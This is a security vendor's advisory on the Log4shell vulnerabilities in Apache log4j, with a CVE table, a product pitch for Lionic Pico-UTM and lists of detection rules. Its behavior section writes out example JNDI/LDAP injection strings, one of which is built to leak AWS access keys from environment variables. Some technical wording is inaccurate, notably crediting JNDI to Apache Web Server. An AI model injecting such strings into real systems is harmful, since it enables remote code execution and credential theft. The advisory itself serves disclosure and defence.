Hsinchu, Taiwan – Dec 19, 2021 – One of the Apache Log4shell Vulnerabilities has the CVSS score as 10. The full score of CVSS is 10 and thus this is the highest level critical. Its name is CVE-2021-44228 and means that the JNDI feature of Apache Web Server used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. Apache organization fixed it and released log4j2 version 2.15. And then, CVE-2021-45046 is found in version 2.15 soon and therefore version 2.16 is released. Again, CVE-2021-45105 is found in version 2.16 soon and 2.17 is released.
Also, CVE-2021-4104 is the vulnerability in log4j version 1.2. Although log4j version 1 is end of life already, some people may still use it and not upgrade to version 2.
CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 have some other names like log4j, log4j2, log4shell and so on. Actually log4j and log4j2 are the very popular logging tools maintained by Apache organization for sending text to be stored in log files and/or databases. The log4j (version 1) is end of life and log4j2 (version 2) is the latest. Log4shell is the more precise name for these vulnerabilities because cyber-criminals can execute remote code easily with those vulnerabilities. Whether you are using log4j version 1 or 2, you are strongly recommended to adopt the latest version of log4j2 for security reasons. At the time of writing, the version 2.17 is the latest version.
Update: The CVSS score of CVE-2021-45046 is adjusted from 3.7 to 9 on Dec 17, 2021. And another CVE-2021-45105 is found that it can be used in DoS (Denial of Service) attack.
CVE Id | CVE Description | CVSS v3 Score | Severity Level | Affected log4j Versions |
---|---|---|---|---|
CVE-2021-44228 | JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. | 10.0 | Critical | Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 |
CVE-2021-45046 | It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. | 9.0 | Critical | Log4j2 2.15 only |
CVE-2021-45105 | Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. | 7.5 | High | Log4j2 versions 2.0-alpha1 through 2.16. |
CVE-2021-4104 | JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. | N/A | N/A | Log4j 1.2 only. |
According to the technical report of Rapid7, many cyber-criminals in the world begin using these vulnerabilities since November, 2021.
Log4shell Behavior
CVE-2021-44228 allows an attacker to craft an LDAP request that can retrieve and run payloads on a vulnerable host. In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form “${prefix:name}”. The example is “${jndi:ldap://example.com/file}” will load data from “ldap://example.com/file” if connected to the Internet and cyber-criminal has prepared a malicious LDAP server at “example.com”.
This vulnerability also allows information leakage where the attacker can read and show data from files and environment variables on the vulnerable host using an LDAP request. Such LDAP requests can generate a DNS request leaking sensitive information for applications such as AWS, Hadoop, Postgres etc.
An example of the format of a JNDI lookup that generates an LDAP request resulting in a DNS request leaking the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY values:
${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.
There are a lot of real examples about log4shell. The first one is the YouTube video of cracking the popular Minecraft game via Log4shell vulnerability from IKteam. And the second one is the cracked Tesla car via Log4shell vulnerability from ExploitWareLabs.
Lionic’s Anti-Intrusion and Anti-Virus rules for Log4shell Vulnerabilities
Again, Lionic studied the log4shell vulnerabilities immediately and released related signature. Both Anti-Intrusion and Anti-Virus signature databases have some rules which can defend against the log4shell vulnerabilities. All Lionic security technology based products can protect against log4shell vulnerabilities after their signatures are updated to the latest version.
The following two YouTube videos prove that Lionic Pico-UTM can block the log4shell vulnerabilities.
Partial list of Anti-Intrusion rules for Log4shell Vulnerabilities:
Rule ID | Description |
---|---|
8100903 ~ 8100908 | Apache Log4j JNDI Injection Remote Code Execution attempt |
… | … |
Partial list of Anti-Virus rules for Log4shell Vulnerabilities:
Rule ID | Virus Name | Release Date |
---|---|---|
9114807219854095 | Trojan.HTML.Generic.4 | 2021-12-16 |
9093020794585558 | Trojan.Java.Agent.4 | 2021-12-16 |
9189618224015584 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9235690281452323 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9008999622847201 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9191827434065719 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9033340405765520 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9067928544323220 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9146325989646571 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9259682338799974 | Trojan.Script.Zojfor.4 | 2021-12-16 |
9014239844713955 | Trojan.ZIP.Zojfor.4 | 2021-12-16 |
9119691314816421 | Trojan.Java.Agent.3 | 2021-12-16 |
9040875976256033 | Trojan.Java.Agent.4 | 2021-12-15 |
9242430171087494 | Trojan.Script.Generic.4 | 2021-12-15 |
9211518412509961 | Riskware.ZIP.Generic.1 | 2021-12-15 |
9159737756054731 | Trojan.Script.Generic.4 | 2021-12-14 |
9046580433934920 | Trojan.Script.Zojfor.4 | 2021-12-14 |
9151855514369988 | Trojan.Script.Zojfor.4 | 2021-12-14 |
… | … | … |
Conclusion
Plenty of companies adopted Apache Web Server, Tomcat and are running many Java programs. Undoubtedly they are also using log4j2 as the logging tool. Therefore, many big companies like Amazon AWS, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, Cisco, NetApp and others issued the log4shell warnings to their customers. The companies adopted log4j2 are strongly recommended to upgrade their log4j2 to version 2.17 or later for defending against CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-4104. This is the best method for pulling the plug.
However, if network administrators are tired of fixing the endless stream of cybersecurity vulnerabilities, they can use the Lionic Pico-UTM as the “Virtual Bug Fix”. The administrators can take their time to wait the stable version and then upgrade. Also, please note that some security network appliances have Anti-Intrusion feature only and no Anti-virus feature. Both the Anti-Intrusion rules and Anti-Virus rules released by Lionic proved that only Anti-Intrusion feature is not enough for protection once again.
References:
- Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
- CVE-2021-44228, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
- CVE-2021-45046, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
- CVE-2021-45105, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
- CVE-2021-4104, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104
- Apache Log4j Vulnerability CVE-2021-44228 Raises widespread Concerns, https://blogs.juniper.net/en-us/security/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns
- Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations, https://www.rapid7.com/blog/post/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/
- The Every person’s Guide to Log4Shell, (CVE-2021-44228), https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/
- ExploitWareLabs, https://www.facebook.com/ExWareLabs
- Log4Shell, https://en.wikipedia.org/wiki/Log4Shell
- Apache Log4j Security Vulnerabilities, https://logging.apache.org/log4j/2.x/security.html
關於Lionic Corporation
Lionic Corporation是創新的「深層數據包檢測」解決方案的全球供應商。 Lionic的技術包括完整的基於DPI的軟件引擎和相關的管理軟件,這些軟件提供可解決防病毒,防入侵,防網絡威脅的「安全解決方案」。 以及「內容管理解決方案」,用於解決應用程序標識,設備標識,基於應用程序的QoS,Web內容過濾,家長控制。
Lionic的安全和內容管理解決方案,基於雲的掃描服務和簽名訂閱服務已經在世界範圍內廣泛部署, 他們幫助服務供應商,網絡設備製造商,半導體公司等,以實現下一代家用商業路由器網關,SD WAN邊緣和雲網關,高級防火牆,UTM,智慧網卡和移動設備。 那些由Lionic支持的產品可提供更好的網絡管理和保護全球網絡免受不斷增加的安全威脅。